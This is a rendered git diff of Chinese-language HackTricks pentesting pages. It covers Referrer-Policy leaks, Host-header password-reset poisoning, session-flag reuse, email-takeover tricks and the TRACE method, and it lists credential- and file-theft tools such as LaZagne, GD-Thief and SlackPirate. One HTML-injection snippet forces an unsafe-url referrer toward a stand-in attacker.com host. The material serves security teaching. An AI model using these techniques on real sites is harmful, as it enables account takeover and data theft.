学习并练习 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
* 你在一家**网络安全公司**工作吗?想要在HackTricks中看到你的**公司广告**吗?或者想要获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 发现我们的独家[**NFT收藏品The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
##
|
||||
|
||||
##
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,29 +1,29 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零到英雄学习AWS黑客攻击</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
# 引用者标头和策略
|
||||
|
||||
# Referrer头部和策略
|
||||
引用者是浏览器用来指示之前访问的页面的标头。
|
||||
|
||||
Referrer是浏览器用来指示访问者之前访问的页面的头部。
|
||||
## 泄露的敏感信息
|
||||
|
||||
## 泄露敏感信息
|
||||
|
||||
如果在网页的某个地方,任何敏感信息位于GET请求参数中,如果页面包含指向外部资源的链接,或者攻击者能够使/建议(社会工程)用户访问由攻击者控制的URL。攻击者可能能够从最后的GET请求中窃取敏感信息。
|
||||
如果在网页中的某个位置存在任何敏感信息在GET请求参数中,如果页面包含指向外部来源的链接或攻击者能够使/建议(社会工程)用户访问攻击者控制的URL。它可能能够在最新的GET请求中外泄敏感信息。
|
||||
|
||||
## 缓解措施
|
||||
|
||||
您可以使浏览器遵循一个**Referrer-policy**,该策略可以**避免**将敏感信息发送到其他网络应用程序:
|
||||
您可以让浏览器遵循一个**引用者策略**,这可以**避免**敏感信息被发送到其他Web应用程序:
|
||||
```
|
||||
Referrer-Policy: no-referrer
|
||||
Referrer-Policy: no-referrer-when-downgrade
|
||||
|
@ -34,28 +34,28 @@ Referrer-Policy: strict-origin
|
|||
Referrer-Policy: strict-origin-when-cross-origin
|
||||
Referrer-Policy: unsafe-url
|
||||
```
|
||||
## 反缓解措施
|
||||
## 对抗措施
|
||||
|
||||
您可以使用HTML元标签覆盖此规则(攻击者需要利用HTML注入):
|
||||
您可以使用 HTML meta 标签覆盖此规则(攻击者需要利用 HTML 注入):
|
||||
```markup
|
||||
<meta name="referrer" content="unsafe-url">
|
||||
<img src="https://attacker.com">
|
||||
```
|
||||
## 防御
|
||||
|
||||
永远不要在URL的GET参数或路径中放置任何敏感数据。
|
||||
永远不要将任何敏感数据放在URL的GET参数或路径中。
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并实践GCP Hacking:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客攻击直到成为专家,通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,57 +1,63 @@
|
|||
# 其他网络技巧
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
* 你在一家**网络安全公司**工作吗?想要在HackTricks中看到你的**公司广告**吗?或者想要获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 发现我们的独家[**NFT收藏品The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass),或者**关注**我在**Twitter上** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧**。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
### Host头
|
||||
### 主机头部
|
||||
|
||||
有时后端会信任**Host头**来执行某些操作。例如,它可以将其值用作发送密码重置的**域名**。因此,当您收到一封带有重置密码链接的电子邮件时,使用的域名就是您在Host头中输入的域名。然后,您可以请求其他用户的密码重置并将域名更改为您控制的域名,以窃取他们的密码重置代码。[WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2)。
|
||||
有时后端信任**主机头部**来执行某些操作。例如,它可以使用其值作为**发送密码重置的域**。因此,当您收到一封带有重置密码链接的电子邮件时,使用的域是您放在主机头部中的域。然后,您可以请求其他用户的密码重置并将域更改为您控制的域,以窃取其密码重置代码。[WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2)。
|
||||
|
||||
{% hint style="warning" %}
|
||||
请注意,您甚至可能无需等待用户单击重置密码链接即可获取令牌,因为**垃圾邮件过滤器或其他中间设备/机器人可能会单击链接以进行分析**。
|
||||
请注意,您甚至可能无需等待用户单击重置密码链接以获取令牌,因为**垃圾邮件过滤器或其他中间设备/机器人可能会单击以分析它**。
|
||||
{% endhint %}
|
||||
|
||||
### 会话布尔值
|
||||
|
||||
有时,当您正确完成某些验证时,后端会**将一个布尔值(True)添加到会话的安全属性中**。然后,不同的端点将知道您是否成功通过了该检查。\
|
||||
然而,如果您**通过了检查**并且您的会话在安全属性中被授予了该"True"值,您可以尝试访问其他依赖于相同属性的资源,但您**不应该有权限**访问这些资源。[WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a)。
|
||||
有时,当您正确完成某些验证时,后端将**只向您的会话的安全属性添加一个值为“True”的布尔值**。然后,不同的端点将知道您是否成功通过了该检查。\
|
||||
但是,如果您**通过了检查**并且您的会话被授予了安全属性中的“True”值,您可以尝试**访问其他资源**,这些资源**依赖于相同的属性**,但您**不应该有权限访问**。[WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a)。
|
||||
|
||||
### 注册功能
|
||||
|
||||
尝试以已存在的用户注册。还可以尝试使用等效字符(点、大量空格和Unicode)。
|
||||
尝试以已存在的用户注册。还尝试使用等效字符(点、大量空格和 Unicode)。
|
||||
|
||||
### 接管电子邮件
|
||||
|
||||
注册一个电子邮件,在确认之前更改电子邮件,然后,如果新的确认电子邮件发送到第一个注册的电子邮件,您可以接管任何电子邮件。或者,如果您可以启用第二个电子邮件来确认第一个电子邮件,您也可以接管任何帐户。
|
||||
注册一个电子邮件,在确认之前更改电子邮件,然后,如果新的确认电子邮件发送到第一个注册的电子邮件,您可以接管任何电子邮件。或者如果您可以启用第二个电子邮件确认第一个电子邮件,您也可以接管任何帐户。
|
||||
|
||||
### 访问使用Atlassian的公司的内部服务台
|
||||
### 访问使用 Atlassian 的公司内部服务台
|
||||
|
||||
{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
|
||||
|
||||
### TRACE方法
|
||||
### TRACE 方法
|
||||
|
||||
开发人员可能会忘记在生产环境中禁用各种调试选项。例如,HTTP `TRACE` 方法是为了诊断目的而设计的。如果启用,Web服务器将通过在响应中回显确切接收到的请求来响应使用`TRACE`方法的请求。这种行为通常是无害的,但有时会导致信息泄露,例如可能由反向代理附加到请求中的内部身份验证标头的名称。![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
|
||||
开发人员可能会忘记在生产环境中禁用各种调试选项。例如,HTTP `TRACE` 方法是为诊断目的而设计的。如果启用,Web 服务器将通过在响应中回显接收到的确切请求来响应使用 `TRACE` 方法的请求。这种行为通常是无害的,但有时会导致信息泄露,例如可能由反向代理附加到请求的内部身份验证标头的名称。![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
|
||||
|
||||
![Image for post](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 推特 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 YouTube 🎥</strong></a></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
* 你在一家**网络安全公司**工作吗?想要在HackTricks中看到你的**公司广告**吗?或者想要获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 发现我们的独家[**NFT收藏品The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||||
* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass),或者**关注**我在**Twitter上** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
|
||||
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧**。
|
||||
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,36 +1,21 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为英雄级人物</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
**研究更多关于对DNS的攻击**
|
||||
|
||||
**DNSSEC和DNSSEC3**
|
||||
|
||||
**IPv6中的DNS**
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为英雄级人物</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
**深入研究DNS攻击**
|
||||
|
||||
**DNSSEC 和 DNSSEC3**
|
||||
|
||||
**IPv6 中的 DNS**
|
||||
|
|
|
@ -1,45 +1,28 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为英雄</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
## **本地战利品**
|
||||
|
||||
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): 这些脚本除了寻找PE向量外,还会在文件系统内查找敏感信息。
|
||||
* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne项目**是一个开源应用程序,用于**检索存储在本地计算机上的大量密码**。每个软件使用不同的技术存储其密码(明文、API、自定义算法、数据库等)。这个工具是为了找到最常用软件的这些密码而开发的。
|
||||
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng):这些脚本除了寻找 PE 向量外,还会在文件系统中寻找敏感信息。
|
||||
* [**LaZagne**](https://github.com/AlessandroZ/LaZagne):**LaZagne 项目** 是一个开源应用程序,用于检索存储在本地计算机上的许多密码。每个软件都使用不同的技术(明文、API、自定义算法、数据库等)存储其密码。该工具旨在查找这些最常用软件的密码。
|
||||
|
||||
## **外部服务**
|
||||
|
||||
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): 这个模块将使用访问令牌连接到Confluence的API,导出为PDF,并下载目标有权访问的Confluence文档。
|
||||
* [**GD-Thief**](https://github.com/antman1p/GD-Thief): 红队工具,用于通过Google Drive API从目标的Google Drive中窃取文件,您(攻击者)可以访问这些文件,包括所有共享文件、所有来自共享驱动器的文件,以及目标有权访问的所有来自域驱动器的文件。
|
||||
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): 红队工具,用于通过Google的People API窃取您有权访问的目标组织的Google People目录。
|
||||
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** 这是一个用Python开发的工具,它使用原生的Slack API从Slack工作区提取'有趣'的信息,前提是有一个访问令牌。
|
||||
* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound是一个命令行工具,用于红队和蓝队快速对Slack工作区/组织进行侦察。Slackhound使得组织的用户、文件、消息等的收集变得快速可搜索,大型对象被写入CSV以供离线审查。
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为英雄</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。**
|
||||
|
||||
</details>
|
||||
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief):此模块将使用访问令牌连接到 Confluence 的 API,导出为 PDF,并下载目标可以访问的 Confluence 文档。
|
||||
* [**GD-Thief**](https://github.com/antman1p/GD-Thief):红队工具,用于通过 Google Drive API 从攻击者可以访问的目标的 Google Drive 中窃取文件。这包括所有共享文件、所有来自共享驱动器的文件以及目标可以访问的所有来自域驱动器的文件。
|
||||
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief):红队工具,用于通过 Google 的 People API 从您可以访问的目标组织的 Google People 目录中窃取信息。
|
||||
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:**这是一个用 Python 开发的工具,使用本机 Slack API 从 Slack 工作区提取“有趣”的信息,只需提供访问令牌。
|
||||
* [**Slackhound**](https://github.com/BojackThePillager):Slackhound 是一个命令行工具,供红队和蓝队快速对 Slack 工作区/组织执行侦察。Slackhound 使组织的用户、文件、消息等的收集快速可搜索,并将大型对象写入 CSV 以供离线审查。
|
||||
|
|
Loading…
Reference in a new issue